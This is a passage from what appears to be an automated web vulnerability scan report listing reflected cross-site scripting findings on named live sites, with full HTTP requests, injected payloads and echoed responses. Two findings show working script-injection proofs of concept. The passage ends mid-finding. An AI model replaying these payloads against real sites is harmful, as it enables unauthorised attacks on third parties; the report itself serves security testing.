Content-Length: 10039
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-shipping-uc_quote-78f82"><a>e24ed7b784c" class="section-sites sidebar-none">
...[SNIP]...

2.79. http://www.ciphertex.com/sites/all/modules/ubercart/uc_attribute/uc_attribute.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_attribute/uc_attribute.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a64cf"><a>25774fd7546 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercarta64cf"><a>25774fd7546/uc_attribute/uc_attribute.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:19 GMT
Vary: Accept-Encoding
Content-Length: 10061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercarta64cf"><a>25774fd7546-uc_attribute-uc_attribute.css" class="section-sites sidebar-none">
...[SNIP]...

2.80. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_order/uc_order.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a3eb"><a>6d01f6ced87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9a3eb"><a>6d01f6ced87/all/modules/ubercart/uc_order/uc_order.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:40 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-9a3eb"><a>6d01f6ced87-all-modules-ubercart-uc_order-uc_order.css" class="section-9a3eb">
...[SNIP]...

2.81. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_order/uc_order.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c01"><a>0a6bfc45d0a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/34c01"><a>0a6bfc45d0a/uc_order.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:19 GMT
Vary: Accept-Encoding
Content-Length: 10029
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-34c01"><a>0a6bfc45d0a-uc_order.css" class="section-sites sidebar-none">
...[SNIP]...

2.82. http://www.ciphertex.com/sites/all/modules/ubercart/uc_product/uc_product.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_product/uc_product.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37679"><a>cd992addf4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/uc_product37679"><a>cd992addf4/uc_product.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:04 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-uc_product37679"><a>cd992addf4-uc_product.css" class="section-sites sidebar-none">
...[SNIP]...

2.83. http://www.ciphertex.com/sites/all/modules/views_accordion/views-accordion.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/views_accordion/views-accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac140"><a>ee39bd0a068 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modulesac140"><a>ee39bd0a068/views_accordion/views-accordion.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:32 GMT
Vary: Accept-Encoding
Content-Length: 10055
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modulesac140"><a>ee39bd0a068-views_accordion-views-accordion.css" class="section-sites sidebar-none">
...[SNIP]...

2.84. http://www.ciphertex.com/sites/default/files/banners/fose.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/banners/fose.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84d"><a>7d48320370f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/default/files2c84d"><a>7d48320370f/banners/fose.jpg?1308766591 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:10 GMT
Vary: Accept-Encoding
Content-Length: 10030
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-default-files2c84d"><a>7d48320370f-banners-fose.jpg" class="section-sites sidebar-none">
...[SNIP]...

2.85. http://www.ciphertex.com/sites/default/files/banners/super_savings.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/banners/super_savings.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb692"><a>81b6a9dd69a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/default/filesbb692"><a>81b6a9dd69a/banners/super_savings.jpg?1312833278 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:26 GMT
Vary: Accept-Encoding
Content-Length: 10048
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-default-filesbb692"><a>81b6a9dd69a-banners-super_savings.jpg" class="section-sites sidebar-none">
...[SNIP]...

2.86. http://www.ciphertex.com/sites/default/files/hp.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/hp.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d78c8"><a>08c8f38d311 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitesd78c8"><a>08c8f38d311/default/files/hp.swf HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:45 GMT
Vary: Accept-Encoding
Content-Length: 10020
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sitesd78c8"><a>08c8f38d311-default-files-hp.swf" class="section-sitesd78c8">
...[SNIP]...

2.87. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/minnelli/minnelli.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32443"><a>bbdb3da3f46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/garland32443"><a>bbdb3da3f46/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:16 GMT
Vary: Accept-Encoding
Content-Length: 10022
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-garland32443"><a>bbdb3da3f46-minnelli-minnelli.css" class="section-themes sidebar-none">
...[SNIP]...

2.88. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f99"><a>90e517ca856 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/13f99"><a>90e517ca856/style.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:25 GMT
Vary: Accept-Encoding
Content-Length: 9984
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-13f99"><a>90e517ca856-style.css" class="section-themes sidebar-none">
...[SNIP]...

2.89. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9780e"><a>2292d728864 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/garland/style.css9780e"><a>2292d728864?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:18 GMT
Vary: Accept-Encoding
Content-Length: 9998
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-garland-style.css9780e"><a>2292d728864" class="section-themes sidebar-none">
...[SNIP]...

2.90. http://www.fastcompany.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9939"><script>alert(1)</script>44507fb50f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a9939"><script>alert(1)</script>44507fb50f4=1 HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:58 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:09:18 GMT
Last-Modified: Mon, 12 Sep 2011 12:49:17 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1315831757-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www010
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Content-Length: 67722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<link rel="canonical" href="/?a9939"><script>alert(1)</script>44507fb50f4=1" />
...[SNIP]...

2.91. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9a84"-alert(1)-"276e5b2f698 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contenta9a84"-alert(1)-"276e5b2f698/flashbox/42684-mtv-uk-homepage-615x340?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:38 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:39 GMT
Date: Mon, 12 Sep 2011 12:50:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/contenta9a84"-alert(1)-"276e5b2f698/flashbox/42684-mtv-uk-homepage-615x340");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.
...[SNIP]...

2.92. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

